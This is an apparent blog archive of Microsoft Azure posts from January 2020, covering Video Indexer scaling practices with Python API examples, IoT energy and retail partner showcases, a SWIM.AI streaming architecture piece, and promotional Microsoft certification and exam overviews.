Thursday, 30 January 2020

Six things to consider when using Video Indexer at scale

Your archive of videos to index keeps growing, so you have been evaluating Microsoft Video Indexer and decided that you want to take your relationship with it to the next level by scaling up.

In general, scaling shouldn’t be difficult, but when you first face such a process you might not be sure of the best way to do it. Questions like “Are there any technological constraints I need to take into account?”, “Is there a smart and efficient way of doing it?”, and “Can I avoid spending excess money in the process?” may cross your mind. So, here are six best practices for using Video Indexer at scale.

1. When uploading videos, prefer URL over sending the file as a byte array


Video Indexer gives you the choice to upload videos from a URL or directly by sending the file as a byte array, but remember that the latter comes with some constraints.

First, it has file size limitations: a byte-array upload is limited to 2 GB, compared to the 30 GB limit when uploading from a URL.

Second, and more importantly for your scaling, sending files as multi-part byte arrays creates a heavy dependency on your network. Service reliability, connectivity, upload speed, and packets lost somewhere on the world wide web are just some of the issues that can affect your performance and hence your ability to scale.


When you upload videos using a URL, you just need to give us a path to the location of the media file and we will take care of the rest.

To upload videos by URL via the API, you can check this short code sample, or you can use AzCopy for a fast and reliable way to get your content into a storage account, from which you can submit it to Video Indexer using a SAS URL.
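
If it helps to see the shape of such a call, below is a minimal sketch in Python using the requests library. The location, account ID, access token, and video URL are placeholders, and the endpoint follows the publicly documented upload-video API, so treat it as an illustration rather than a drop-in client.

import requests

# Placeholders - substitute your own values.
LOCATION = "trial"                  # or an Azure region such as "westus2"
ACCOUNT_ID = "<your-account-id>"
ACCESS_TOKEN = "<account-access-token-with-write-permission>"
VIDEO_URL = "https://mystorage.blob.core.windows.net/videos/demo.mp4?<SAS>"

# Upload by URL: Video Indexer fetches the file itself, so there is no
# multi-part transfer from your machine and no 2 GB byte-array limit.
response = requests.post(
    f"https://api.videoindexer.ai/{LOCATION}/Accounts/{ACCOUNT_ID}/Videos",
    params={
        "name": "demo-video",
        "videoUrl": VIDEO_URL,
        "accessToken": ACCESS_TOKEN,
    },
)
response.raise_for_status()
print(response.json()["id"])  # keep the video ID for status checks later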


2. Increase media reserved units if needed


Usually, in the proof-of-concept stage when you are just starting to use Video Indexer, you don’t need a lot of computing power. Now that you want to scale up your usage, you have a larger archive of videos to index and you want the process to run at a pace that fits your use case. Therefore, you should consider increasing the number of compute resources you use if the current amount of computing power is simply not enough.

In Azure Media Services, when talking about computing power and parallelization, we talk about media reserved units (RUs): the compute units that determine the parameters of your media processing tasks. The number of RUs affects how many media tasks can be processed concurrently in each account, their type determines the speed of processing, and one video might require more than one RU if its indexing is complex. When your RUs are busy, new tasks are held in a queue until another resource becomes available.

We know you want to operate efficiently and don’t want resources that stay idle part of the time. For that reason, we offer an auto-scale system that spins RUs down when less processing is needed and spins them up during your rush hours (up to the full number of RUs you have). You can easily enable this functionality by turning on autoscale in the account settings or by using the Update-Paid-Account-Azure-Media-Services API.


To minimize indexing duration and avoid low throughput, we recommend you start with 10 RUs of type S3. Later, if you scale up to support more content or higher concurrency and need more resources to do so, you can contact us through the support system (on paid accounts only) to request a larger RU allocation.

3. Respect throttling


Video Indexer is built to deal with indexing at scale, and when you want to get the most out of it you should also be aware of the system’s capabilities and design your integration accordingly. You don’t want to send an upload request for a batch of videos just to discover that some of them didn’t upload and you are receiving an HTTP 429 response code (too many requests). This can happen when you send more requests than the per-minute limit we support. Don’t worry: in the HTTP response we add a Retry-After header that specifies when you should attempt your next retry. Make sure you respect it before trying your next request.
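
As an illustration, here is a minimal Python sketch of a client that honors Retry-After before resending; the function and parameter names are ours, not part of the Video Indexer API.

import time
import requests

def post_with_retry(url, params, max_attempts=5):
    """POST a request, backing off whenever the service answers HTTP 429."""
    for attempt in range(max_attempts):
        response = requests.post(url, params=params)
        if response.status_code != 429:
            return response
        # Respect the Retry-After header before the next attempt.
        # (It is read as seconds here; a production client should also
        # handle the HTTP-date form of the header.)
        wait_seconds = int(response.headers.get("Retry-After", 30))
        time.sleep(wait_seconds)
    raise RuntimeError(f"Still throttled after {max_attempts} attempts")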


4. Use callback URL


Have you ever called customer service and been told, “I’m processing your request, it will take a few minutes. You can leave your phone number and we’ll get back to you when it is done”? The cases where you do leave your number and they call you back the moment your request is processed follow exactly the same concept as using a callback URL.

So, instead of constantly polling the status of your request from the second you send the upload request, just add a callback URL and wait for us to update you. As soon as there is any status change in your upload request, we send a POST notification to the URL you provided.

You can add a callback URL as one of the parameters of the upload-video API (see the parameter description in the API reference). If you are not sure how to do it, you can check the code samples from our GitHub repo. By the way, for the callback URL you can also use Azure Functions, a serverless event-driven platform that can be triggered by HTTP and implement the following flow.
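
As a sketch, the callback is just one more query parameter on the upload call shown earlier; the URL below is a hypothetical Azure Functions HTTP endpoint, and the exact notification payload is described in the API documentation.

import requests

LOCATION = "trial"
ACCOUNT_ID = "<your-account-id>"
ACCESS_TOKEN = "<account-access-token>"

requests.post(
    f"https://api.videoindexer.ai/{LOCATION}/Accounts/{ACCOUNT_ID}/Videos",
    params={
        "name": "demo-video",
        "videoUrl": "https://mystorage.blob.core.windows.net/videos/demo.mp4?<SAS>",
        "accessToken": ACCESS_TOKEN,
        # Video Indexer POSTs a notification here on each status change,
        # so there is no need to poll for the indexing state in a loop.
        "callbackUrl": "https://myfunctionsapp.azurewebsites.net/api/vi-callback",
    },
)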


5. Use the right indexing parameters for you


Probably the first thing you need to do when using Video Indexer, and especially when trying to scale, is to think about how to get the most out of it with the right parameters for your needs. Think about your use case: by defining the right parameters you can save money and make the indexing process for your videos faster.

We give you the option to customize your usage of Video Indexer by choosing these indexing parameters. Don’t set the streaming preset if you don’t plan to watch the video, and don’t index video insights if you only need audio insights. It is that easy.
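
For example, here is a hedged sketch of an upload call that asks for audio-only insights and skips the streaming encode; parameter names such as indexingPreset and streamingPreset and the values shown follow the upload-video API reference, so confirm the exact names and allowed values in the current documentation before relying on them.

import requests

LOCATION = "trial"
ACCOUNT_ID = "<your-account-id>"
ACCESS_TOKEN = "<account-access-token>"

requests.post(
    f"https://api.videoindexer.ai/{LOCATION}/Accounts/{ACCOUNT_ID}/Videos",
    params={
        "name": "podcast-episode-42",
        "videoUrl": "https://mystorage.blob.core.windows.net/audio/ep42.mp3?<SAS>",
        "accessToken": ACCESS_TOKEN,
        "indexingPreset": "AudioOnly",     # skip video insights when only audio matters
        "streamingPreset": "NoStreaming",  # don't encode for playback you won't watch
    },
)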

6. Index in optimal resolution, not highest resolution


Not too long ago, HD video didn’t exist. Now we have videos of varied quality, from HD to 8K. The question is, what video quality do you need for indexing your videos? The higher the quality of the movie you upload, the larger the file size, and this means more computing power and time are needed to upload the video.

Our experience shows that, in many cases, indexing performance is almost identical between HD (720p) videos and 4K videos. Eventually, you’ll get almost the same insights with the same confidence.

For example, for the face detection feature, a higher resolution can help with the scenario where there are many small but contextually important faces. However, this will come with a quadratic increase in runtime and an increased risk of false positives.

Therefore, we recommend that you verify you get the right results for your use case and test it locally first: upload the same video in 720p and in 4K and compare the insights you get. Remember, there’s no need to use a cannon to kill a fly.

Tuesday, 28 January 2020

Fueling intelligent energy with IoT

At Microsoft, building a future that we can all thrive in is at the center of everything we do. On January 16, as part of the announcement that Microsoft will be carbon negative by 2030, we discussed how advances in human prosperity, as measured by GDP growth, are inextricably tied to the use of energy. Microsoft has committed to deploy $1 billion into a new climate innovation fund to accelerate the development of carbon reduction and removal technologies that will help us and the world become carbon negative. The Azure IoT team continues to invest in the platforms and tools that enable solution builders to deliver new energy solutions and enable customers to empower their workforce, optimize digital operations, and build smart, connected cities, vehicles, and buildings.


Earlier, Microsoft committed $50 million through Microsoft AI for Earth, which puts technology, resources, and expertise into the hands of those working to solve our most complex global environmental challenges, such as helping customers around the world meet their energy and sustainability commitments. Our partnership with Vattenfall illustrates how we will power new Swedish datacenter locations with renewable energy, and our partnership with E.ON, which manages low-voltage distribution grids, is challenging the limits of traditional technology for those grids through an in-house IoT platform based on Microsoft Azure IoT Hub.

Over the past few years, our engineers have had the pleasure to connect with and learn from a large ecosystem of energy solution builders and customers that are proactively shifting their consumption priorities. Transmission system operators (TSOs) are focused on transforming grid operations while distribution system operators (DSOs) and utilities are approaching their customers with new solutions, and all participants are requesting better, more accurate, more secure data.

As millions of new electric vehicles are entering our roads, new challenges arise around the transformation of the energy grid that moves us in our daily commutes. At the heart of these transformations are solutions that help energy providers get connected, stay connected, and transform their businesses through devices, insights, and actions.

Late in 2019, we announced updates to Azure IoT Central to help solution builders move beyond proof of concept to building business-critical applications they can brand and sell directly or through Microsoft AppSource. Builders can brand, customize, and make apps their own through extensibility via APIs, data connectors to business applications, and repeatability and manageability of their investment through multitenancy and seamless device connectivity. Two IoT Central energy app templates, for solar panel and smart meter monitoring, already help energy solution builders accelerate development.

Azure IoT Central Energy App Templates.

DistribuTECH 2020


DistribuTECH International is the leading annual transmission and distribution event, addressing the technologies used to move electricity from the power plant through the transmission and distribution systems to the meter and inside the home. For this year’s event, held January 28 to January 30 in San Antonio, Texas, we invited eight leading energy solution builders to join us and demonstrate how they have leveraged Azure IoT to deliver amazing innovation. These partners join Azure IoT experts who are available to discuss your business scenarios or get more specific about IoT devices, working with IoT data, and delivering a secure solution from the edge to the cloud.

Partners fueling intelligent energy


NXP EdgeVerse™ platform: intelligently manage grid load securely at the edge

The shift to vehicle electrification requires a completely different fueling infrastructure than gas-powered vehicles. Drivers of electric vehicles need to trust they can fuel for every occasion—everywhere, anytime and not get stranded. Every electric utility vehicle in a managed fleet, for example, must be authorized to charge without overloading the grid during peak times.

To manage grid load intelligently, edge computing and security become vital. NXP and Microsoft have demonstrated “Demand Side Management” of a smart electric vehicle charging grid and infrastructure running on NXP’s EdgeVerse™ using Azure IoT Central. This solution helps reduce development risk and speed time to market. NXP EdgeVerse includes the NXP Layerscape LS1012 processor and i.MX RT 1060 series, integrated in Scalys TrustBox Edge, to provide best-in-class power efficiency and a highly secure (portable) communication solution that connects to Azure IoT Central. As the fueling model shifts from petroleum to electric, intelligent management of grid load balancing is key.

OMNIO.net: Danish IoT connectivity startup onboarding devices and unifying data

OMNIO.net, a Danish Industrial IoT connectivity startup, is partnering with Microsoft Azure IoT to solve two of the biggest hurdles in Industrial IoT: onboarding of devices and unification of data.

OMNIO.net is helping companies of all sizes that have outfitted their campuses with solar panels. The OMNIO.net solution connects these panels to Azure IoT Hub to gather real-time data that helps optimize energy production and limit downtime. Companies look to OMNIO.net to overcome the challenges of connecting industrial devices and getting the most from their data. What may have taken months in the past now takes less than 24 hours: the combination of OMNIO.net’s energy expertise and Azure IoT gets partners’ devices connected so customers can focus on using their data to solve pressing business challenges rather than on IT.

iGen Technologies: a self-powered heating system for your home

iGen Technologies’ i2 is a self-powered heating system for residential homes. With its patented technology, i2 sets a new benchmark in home comfort and efficiency by generating, storing, and using its own electricity, keeping the heat on even during a grid outage. The system delivers resilience, lower operating costs, efficiency gains, and greenhouse gas emission reductions. The fully integrated solution offers a dispatchable resource with fuel-switching capability, providing utilities a valuable tool to manage peak load and surplus generation situations. iGen has partnered with Microsoft Azure IoT Central to develop a smart IoT interface for the i2 heat and power system. The integration of iGen’s distributed energy resource (DER) technology with Microsoft’s robust IoT app platform offers an ideal solution for utility demand response programs.

The i2 self-powered heating system. 

Agder Energi, NODES: scaling a sustainable and integrated energy marketplace

Distributed energy resources, digitalization, decarbonization, and new consumer behavior introduce challenges and opportunities for grid system operators to maintain reliable operation of the power system and create customer-centric services. The NODES marketplace relies on Azure to scale its flexible marketplace across 15 projects in 10 different European countries. The focus is on the use of flexibility from the distribution grid, transmission and distribution coordination, and integration with current balancing markets. Agder Energi is now piloting a flexible asset register and data hub with device management and analytics built on IoT Central. Rune Hogga, CEO of Agder Energi Flexibility, told us, "In order to have control of the data and be able to verify flexibility trades, Azure IoT Central provides us with a fast and efficient way to set up a system to collect data from a large number of distributed flexible assets."

L&T Technology Services: reducing carbon consumption and emissions

L&T Technology Services (LTTS) has developed low-carbon and EV charging grid solutions for global enterprises, buildings, and smart cities. The LTTS Smart City, Campus & Building solutions reduce carbon emissions by up to 40 percent through its iBEMS on Azure solution, which connects an entire building's infrastructure through a single unified interface. In collaboration with Microsoft Real Estate & Facilities, LTTS is building breakthrough EV charging solutions that give facility managers actionable insights on EV charger assets, including usage patterns, demand forecasting, and design and efficiency anomalies, while accurately tracking carbon credits. The LTTS solution also enables facility managers to optimize the EV charging grid based on energy sources (geothermal, solar, electric) and grid constraints such as energy capacity, and provides consumers with EV charging notifications based on drive-range preferences.

Telensa: helping utilities support the business case for smart street lighting

Telensa makes wireless smart city applications, helping cities and utilities around the world save energy, work smarter, and deliver more cohesive services for their residents. Telensa is demonstrating how utilities can support the business case for smart street lighting, offering a platform to simply and seamlessly add other smart city applications like traffic monitoring, air quality, and EV charging with AI-driven data insights. Telensa’s smart city solutions are increasingly built on Microsoft Azure IoT, leveraging the combination of data, devices, and connectivity to make IoT applications a practical proposition for any city.

Telensa is leading the Urban Data Project, with an initial deployment in Cambridge, UK. This new edge-AI technology generates valuable insights from streetlight-based imaging, creating a trusted infrastructure for urban data that enables cities to collect, protect, and use their data for the benefit of all residents. Telensa’s Urban IQ, which uses Microsoft Power BI for data visualization, is an open, low-cost platform for adding multiple sensor applications.

Telensa’s streetlight based multi-sensor pods, which run on Azure IoT Edge and feature real-time AI and machine learning to extract insights.

eSmart Systems: improving powerline inspections and asset optimization by empowering human experts with Collaborative AI

eSmart Systems helps utilities gain insight into their assets by creating a virtuous cycle of collaboration and training between subject matter experts like Distribution or Transmission Engineers and state of the art deep learning artificial intelligence (AI).

A Microsoft finalist for AI energy partner of the year in 2019, eSmart’s Connected Drone software uses the Azure platform for accurate and self-improving power grid asset discovery and analysis. Grid inspectors continuously review results and correct them to feed more accurate results back into the system. Utilities can use this visual data to improve their asset registries, reduce maintenance costs, and improve reliability.

Kongsberg Digital: Grid Logic digital twin services for electrical grids

Increased electrification and the introduction of intermittent, distributed, and renewable energy production challenge today’s grid operations. A lack of sufficient data and insights leads to over-investment, capacity challenges, and power quality issues. With Grid Logic digital twin services running on Azure, grid operators get forecasting, insight into hotspots, and scenario simulation. With Azure IoT Hub, Grid Logic will make it possible to build a robust operating system for automating real-time grid operation and optimization.

Grid Logic capacity heatmap for a part of Norwegian DSO BKK Nett’s grid.

Let’s connect and collaborate to build your energy solutions

Microsoft Azure IoT is empowering businesses and industries to shape the future with IoT. We’re ready to meet and support you wherever you are in your transformation journey. A strong portfolio of products and partners will help you accelerate building robust IoT solutions to achieve your goals. If you are attending DistribuTECH 2020, speak with Azure IoT experts or connect with one of the partners mentioned above.

Monday, 27 January 2020

MCSE Productivity Certification: How It Impacts Pay and Career


The Microsoft Certified Solutions Expert (MCSE) Productivity certification affirms that an individual has the skills essential to move organizations to the cloud, increase user productivity and flexibility, reduce data loss, and improve data security. The MCSE: Productivity, like all expert-level certifications under Microsoft’s new certification path, enables applicants to choose from a pool of exams to effectively customize their certification to their needs.

To be eligible for the MCSE: Productivity certification, learners must first earn either the MCSA: Office 365 or MCSA: Windows Server 2012 certification as a prerequisite. After obtaining a prerequisite certification, learners must take and pass one of the elective exams.

MCSE: Productivity Certifications


Commonly, learners earning an expert-level certification should have three or more years of experience working with Microsoft products, especially Office 365 or Windows Server 2012 (or 2016).

Why should you Become MCSE: Productivity Certified?

1. To Strengthen your Skills

Becoming a professional in any field demands that you strengthen specific skills. Because of Microsoft’s conducive learning environment, study resources, and precise exams, you can be confident you will succeed. Your certifications will confirm to the world that you have the skills that businesses and other organizations are looking for.

2. Certification by a Leading Vendor Microsoft

Microsoft is one of the most renowned vendors of IT services and products, known for equipping applicants with practical skills that are important in the market today. The procedure you go through while earning your certification is rigorous but worth it. The organization’s goal is to ensure that you obtain thorough skills and expertise to execute technical tasks and help businesses accomplish their goals.

3. You Become more Competent

Gaining relevant skills improves your performance at work. With the latest skills and experience, you’ll take a better approach to technical tasks and problem-solving. So, if you want to be competent in executing your work routines, an MCSE certification will boost your performance.

4. You stand out from your Colleagues

Earning the MCSE: Productivity certification is excellent proof of your skill. Professionals with these certifications are in greater demand than their non-certified peers. Once you receive a Microsoft certification, you’ll be better placed to embrace the opportunities that come up day by day.

5. Better Job Opportunities with MCSE Productivity Certification

Exclusive and competitive skills lead to better job opportunities. With this MCSE certification, you’ll have a greater chance of getting a high-paying job with other perks. As a professional with expertise in Microsoft Exchange Server 2016, you’ll be eligible for jobs like Microsoft server administrator, server engineer, exchange engineer, and Exchange Server systems administrator. These are among the most in-demand skills today.

6. Career Growth

When you have the appropriate skills, you become competent and more trustworthy at work. Being a trustworthy professional means you can expect a lot from your career in the long term. With a genuine qualification, there is a high possibility of receiving a promotion and being assigned more responsibilities that match your skills. MCSE: Productivity confirms to your employer that you are determined to deliver better results. The certification also comes with appealing rewards: professionals who hold it make up to $89,000 per year on average, according to data from Indeed.com.

Tips to help you pass your MCSE: Productivity certification exam

If you’ve now made up your mind to go for this certification, here are tips to help you pass your exam successfully:
  • Obtain and understand the MCSE Productivity exam objectives.
  • Schedule your exam sufficiently in advance to allow you time for preparation.
  • Make a study plan and follow it thoroughly.
  • Get study guides to help you with preparation.
  • Take practice tests.
  • Make sure you get sufficient rest even as you prepare for your exam.
  • Join online discussion groups with like-minded candidates pursuing the same certification.
  • Arrive at the exam center at least 30 minutes before the start.
  • Read exam instructions and questions carefully. Attempt all questions.

Summing It Up
The MCSE: Productivity certification confirms your expertise and dedication to continuous learning across several Microsoft technologies, including prominent products such as Exchange Server, Skype for Business, and SharePoint. This certification serves as proof of your proficiency in managing significant workplace products. Your MCSE: Productivity certification will open up a broad array of excellent career opportunities as you work toward your professional goals.

Sunday, 26 January 2020

Compute and stream IoT insights with data-driven applications

There is a lot more data in the world than can possibly be captured with even the most robust, cutting-edge technology. Edge computing and the Internet of Things (IoT) are just two examples of technologies increasing the volume of useful data. There is so much data being created that the current telecom infrastructure will struggle to transport it and even the cloud may become strained to store it. Despite the advent of 5G in telecom, and the rapid growth of cloud storage, data growth will continue to outpace the capacities of both infrastructures. One solution is to build stateful, data-driven applications with technology from SWIM.AI.

The Azure platform offers a wealth of services for partners to enhance, extend, and build industry solutions. Here we describe how one Microsoft partner uses Azure to solve a unique problem.

Shared awareness and communications


The increase in volume has other consequences, especially when IoT devices must be aware of each other and communicate shared information. Peer-to-peer (P2P) communications between IoT assets can overwhelm a network and impair performance. Smart grids are an example of how sensors or electric meters are networked across a distribution grid to improve the overall reliability and cost of delivering electricity. Using meters to determine the locality of issues can help improve service to a residence, neighborhood, municipality, sector, or region. The notion of shared awareness extends to vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communications. As networked AI spreads to more cars and devices, so do the benefits of knowing the performance or status of other assets. Other use cases include:

◉ Traffic lights that react to the flow of vehicles across a neighborhood.

◉ Process manufacturing equipment that can determine the impact from previous process steps.

◉ Upstream oil/gas equipment performance that reacts to downstream oil/gas sensor validation.

Problem: Excess data means data loss


When dealing with large volumes of data, enterprises often struggle to determine which data to retain, how much to retain, and for how long they must retain it. By default, they may not retain any of it. Or, they may sub-sample data and retain an incomplete data set. That lost data may potentially contain high value insights. For example, consider traffic information that could be used for efficient vehicle routing, commuter safety, insurance analysis, and government infrastructure reviews. The city of Las Vegas maintains over 1,100 traffic light intersections that can generate more than 45TB of data every day. As stated before, IoT data will challenge our ability to transport and store data at these volumes.

Data may also become excessive when it’s aggregated. For example, telecom and network equipment typically create snapshots of data and send them every 15 minutes. By normalizing this data into a summary over time, you lose granularity; the nature or pattern of the data over time, along with any unique, informative events, would be missed. The same applies to any equipment capturing fixed-time window summary data. The loss of data is detrimental to networks where devices share data, either for awareness or communication. The problem is also compounded, as only snapshots are captured and aggregated for an entire network of thousands or millions of devices.

Real-time is the goal


Near real-time is the current standard for stateless application architectures, but “near” real-time is not fast enough anymore. Real-time processing, or processing within milliseconds, is the new standard for V2V or V2I communications and requires a much more performant architecture. Swim does this by leveraging stateful APIs. With stateful connections, it’s possible to have a rapid response between peers in a network. Speed has enormous effects on efficiency and reliability, and it’s essential for systems where safety is paramount, such as crash prevention. Autonomous systems will rely on real-time performance for safety purposes.

An intelligent edge data strategy


SWIM.AI delivers a solution for building scalable streaming applications. According to their site Meet Swim:

“Instead of configuring a separate message broker, app server and database, Swim provides for its own persistence, messaging, scheduling, clustering, replication, introspection, and security. Because everything is integrated, Swim seamlessly scales across edge, cloud, and client, for a fraction of the infrastructure and development cost of traditional cloud application architectures.”

The figure below shows an abstract view of how Swim can simplify IoT architectures:


Harvest data in mid-stream


SWIM.AI uses the lightweight Swim platform, which generates only a 2 MB footprint, to compute and stream IoT insights, building what they call “data-driven applications.” These applications sit in the data stream and generate unique, intelligent web agents for each data source they see. These intelligent web agents then process the raw data as it streams, publishing only state changes from the data stream. This streamed data can be used by other web agents or stored in a data lake, such as Azure.

Swim uses the “needle in a haystack” metaphor to explain this unique advantage. Swim allows you to apply a metal detector while harvesting the grain to find the needle, without having to bale, transport, or store the grain before searching for the needle. The advantage is in continuously processing data, where intelligent web agents can learn over time or be influenced by domain experts that set thresholds.

Because of the stateful architecture of Swim, only the minimum data necessary is transmitted over the network. Furthermore, application services need not wait for the cloud to establish application context. This results in extremely low latencies, as the stateful connections don’t incur the latency cost of reading and writing to a database or updating based on poll requests.
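
The following few lines of Python are not the Swim API; they are only a sketch of the core idea of a stateful agent that remembers the last value per source and publishes only the transitions.

from typing import Dict, Iterable, Iterator, Tuple

def publish_state_changes(readings: Iterable[Tuple[str, str]]) -> Iterator[Tuple[str, str]]:
    """Yield (source_id, state) only when a source's state actually changes."""
    last_state: Dict[str, str] = {}
    for source_id, state in readings:
        if last_state.get(source_id) != state:   # suppress unchanged samples
            last_state[source_id] = state
            yield source_id, state

# Four raw samples collapse into two published transitions.
samples = [("light-17", "green"), ("light-17", "green"),
           ("light-17", "red"), ("light-17", "red")]
print(list(publish_state_changes(samples)))
# [('light-17', 'green'), ('light-17', 'red')]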

On SWIM.AI’s website, a Smart City application shows the real-time status of lights and traffic across a hundred intersections with thousands of sensors. The client using the app could be a connected or an autonomous car approaching the intersection. It could be a handheld device next to the intersection, or a browser a thousand miles away in the contiguous US. The latency to real-time is 75-150ms, less than the blink of an eye across the internet.

Benefits

◉ The immediate benefit is saving costs for transporting and storing data.

◉ Through Swim’s technology, you retain granularity. For example, take tens of terabytes per day generated from 1,000 traffic light intersections and winnow that data down to hundreds of gigabytes per day, while the harvested dataset still fully describes the original raw dataset.

◉ Create efficient networked apps for various data sources. For example, achieve peer-to-peer awareness and communications between assets such as vehicles, devices, sensors, and other data sources across the internet.

◉ Achieve ultra-low latencies in the 75-150 millisecond range. This is the key to creating apps that depend on data for awareness and communications.

Azure services used in the solution


The demonstration of DataFabric from SWIM.AI relies on core Azure services for security, provisioning, management, and storage. DataFabric also uses the Common Data Model to simplify sharing information with other systems, such as Power BI or PowerApps, in Azure. Azure technology enables the customer’s analytics to be integrated with events and native ML and cognitive services.

DataFabric is based on the Microsoft IoT reference architecture and uses the following core components:

◉ IoT Hub: Provides a central point in the cloud to manage devices and their data.

◉ IoT Edge Field gateway: An on-premises solution for delivering cloud intelligence.

◉ Azure Event Hubs: Ingests millions of events per second.

◉ Azure Blob storage: Efficient storage with hot, cool, and archive access tiers.

◉ Azure Data Lake storage: A highly scalable and cost-effective data lake solution for big data analytics.

◉ Azure Stream Analytics: Transforms data into actionable insights and predictions in near real time.
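
For orientation only, here is a minimal sketch of the device side of the first component: a device sending one telemetry message to IoT Hub with the azure-iot-device Python SDK. The connection string and payload fields are placeholders and are not part of the DataFabric solution itself.

import json
from azure.iot.device import IoTHubDeviceClient, Message

# Placeholder: a per-device connection string issued by your IoT Hub.
CONNECTION_STRING = "HostName=<hub>.azure-devices.net;DeviceId=<device>;SharedAccessKey=<key>"

client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)
client.connect()

# One telemetry sample; IoT Hub can route it on to Event Hubs, Stream
# Analytics, or storage depending on how the solution is wired up.
message = Message(json.dumps({"intersection": "lv-0042", "vehicle_count": 17}))
message.content_type = "application/json"
message.content_encoding = "utf-8"
client.send_message(message)

client.disconnect()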

Saturday, 25 January 2020

Retailers embrace Azure IoT Central

For many retailers around the world, the busiest quarter of the year just finished, with holiday shopping running from Black Friday and Cyber Monday through Boxing Day. From supply chain optimization to digital distribution and in-store analytics, the retail industry has wholeheartedly embraced IoT technology to support those spikes in demand, particularly in scenarios where brands need to build flexibility, hire strong talent, and optimize the customer experience in order to build brand loyalty. In our latest IoT Signals for Retail research, commissioned by Microsoft and released in January 2020, we explore the top insights from leaders who are using IoT today. We discuss growth areas such as improving the customer experience, the use of artificial intelligence to achieve breakthrough success, and nuances between global markets around security concerns and compliance.

Building retail IoT solutions with Azure IoT Central


As Microsoft and its global partners continue to turn retail insights into solutions that empower retailers around the world, a key question continues to face decision makers about IoT investments: whether to build a solution from scratch or buy one that fits their needs. For many solution builders, Azure IoT Central is the perfect fit: a fully managed IoT platform with predictable pricing and unique features like retail-specific application templates that can accelerate solution development thanks to the more than 30 underlying Azure services it includes. Let us manage the services so you can focus on what’s more important, applying your deep industry knowledge to help your customers.

New tools to accelerate building a retail IoT Solution

Today we are excited to announce the addition of our sixth IoT Central retail application template for solution builders. The micro-fulfillment center template showcases how connectivity and automation can reduce cost by eliminating downtime, increasing security, and improving efficiency. App templates help solution builders get started quickly and include sample operator dashboards, sample device templates, simulated devices producing real-time data, access to Plug and Play devices, and security features that give you peace of mind. Fulfillment optimization is a cornerstone of operations for many retailers, and optimizing early may offer significant returns in the future. Application templates are helping solution builders overcome challenges like getting past the proof-of-concept phase or building rapid business cases for new IoT scenarios.

IoT Central Retail Application Templates for solution builders.


Innovative Retailers share their IoT stories


In addition to rich industry insights like those found in IoT Signals for Retail, we are proudly releasing three case stories detailing decisions, trade-offs, processes, and results from top global brands investing in IoT solutions, and the retail solution builders supporting them. Read more about how these companies are implementing and winning with their IoT investments and uncover details that might offer you an edge as you navigate your own investments and opportunities.

South Africa Breweries and CIRT team up to solve a cooler tracking conundrum

South Africa Breweries, a subsidiary of AB InBev, the world’s largest brewing company, is committed to keeping its product fresh and cold for customers, a challenge that most consumers take for granted. From tracking missing coolers to reducing costs and achieving sustainability goals, Sameer Jooma, Director of Innovation and Analytics for AB InBev, turned to IoT innovation led by Consumption Information Real Time (CIRT), a South African solution builder. CIRT was tasked with piloting Fridgeloc Connected Cooler, a cooler monitoring system providing real-time insight into temperature (both internal cooler and condenser), connected state, and location of hundreds of coolers across urban and rural South Africa. Revamping an existing cooler audit process that involved auditors visiting dealer locations to verify that a cooler was in the right place, and tracking the time between delivery and installation at an outlet, are just two of the process optimization benefits found by Jooma.

“The management team wanted to have a view of the coolers, and to be able to manage them centrally at a national level. IoT Central enabled us to gain that live view.” - Sameer Jooma, Director: Innovation and Analytics, AB InBev.


On the “road” to a connected cooler in rural South Africa, a field technician gets stuck in the sand on his way to the tavern.


Fridgeloc Connected Cooler at a tavern in Soweto, South Africa.

Mars Incorporated Halloween display campaign unveils new insights thanks to Footmarks Inc.


For most consumer packaged goods companies, sales spike during holiday times thanks to investments across the marketing and sales mix, from online display advertising to in-store physical displays. This past Halloween, Jason Wood, Global Display Development Head at Mars Inc., a global manufacturer of confectionery and other food products, decided it was time to gain deeper insights into the age-old problem of tracking where product displays go after they leave the warehouse. Previously, Mars was only able to track the number of displays it produced and how many left its warehouses for retailer destinations. They found the right partner in Footmarks Inc., which designed its beacon- and gateway-based display tracking solution with Azure IoT Central to deliver secure, simple, and scalable insights into what happens once displays begin transit. Several interesting insights emerged throughout the campaign and afterward.

"Information on when displays came off the floor were surprising—major insights that we wouldn't have been able to get to without the solution." - Jason Wood, Global Display Development Head, Mars Inc.

Footmarks Inc. Smart Connect Cloud dashboard for Mars Wrigley showing the display tracking solution using IoT sensors for the 2019 Halloween campaign.

Microsoft turns to C.H. Robinson and Intel for Xbox and Surface supply chain visibility


In advance of the busy 2019 holiday season and the introduction of many new Surface SKUs, the Microsoft supply chain team was interested in testing the benefits of a single platform connecting IoT devices on shipments globally, streamlining analytics and device management. The team was also thinking ahead, preparing for the launch of the latest Xbox console, Xbox Series X, and for a series of new Surface product launches. With Surface and Xbox demand projected to grow around the world, the need for insights and appropriate actions along the supply chain was only going to increase. The Microsoft team partnered with TMC (a division of C.H. Robinson), a global technology and logistics management provider, which in turn partnered with Intel to design a transformative solution based on its existing Navisphere Vision software that could be deployed globally using Azure IoT Central. The goal was to track and monitor shipments’ ambient conditions for shock, light, and temperature to identify any damage in real time, anywhere in the world, at a scale covering millions of products.

“The real power comes in the combination of C.H. Robinson’s Navisphere Vision, technology that is built by and for supply chain experts, and the speed, security, and connectivity of Azure IoT Central.” - Chris Cutshaw, Director of Commercial and Product Strategy at TMC

Navisphere Vision dashboard showing IoT Sensors activity, managed through Azure IoT Central.

Thursday, 23 January 2020

Microsoft 70-487 Exam Is Your Way to Obtain MCSD App Builder Certification

Hiring managers are always looking for skilled employees, and different organizations have different policies for recruiting them. The hiring process is something that makes the world's top brands stand apart from the rest, because they don't compromise on the quality of the professionals they hire. To guarantee their loyalty, they offer them high salaries.

Microsoft is one such tech company that measures the skills of employees by providing specialized exams and training. Microsoft 70-487 is one of the most challenging exams in the tech field. In this blog, we share tips on how you can pass the exam and obtain your certification. But before that, it is worth getting an overview of the exam to understand it better.

Microsoft 70-487 Exam Details

The Microsoft 70-487 exam is known as Developing Microsoft Azure and Web Services. The exam covers five comprehensive topics, each with its own weighting in the exam.

Microsoft 70-487 Exam Syllabus Topics:

  • Accessing Data (20-25%)
  • Querying and Manipulating Data by Using the Entity Framework (20-25%)
  • Creating and Consuming Web API-based services (20-25%)
  • Designing and Implementing Web Services (15-20%)
  • Deploying Web Applications and Services (15-20%)

The percentages help you manage the time efficiently and see which topics require more time for preparation.

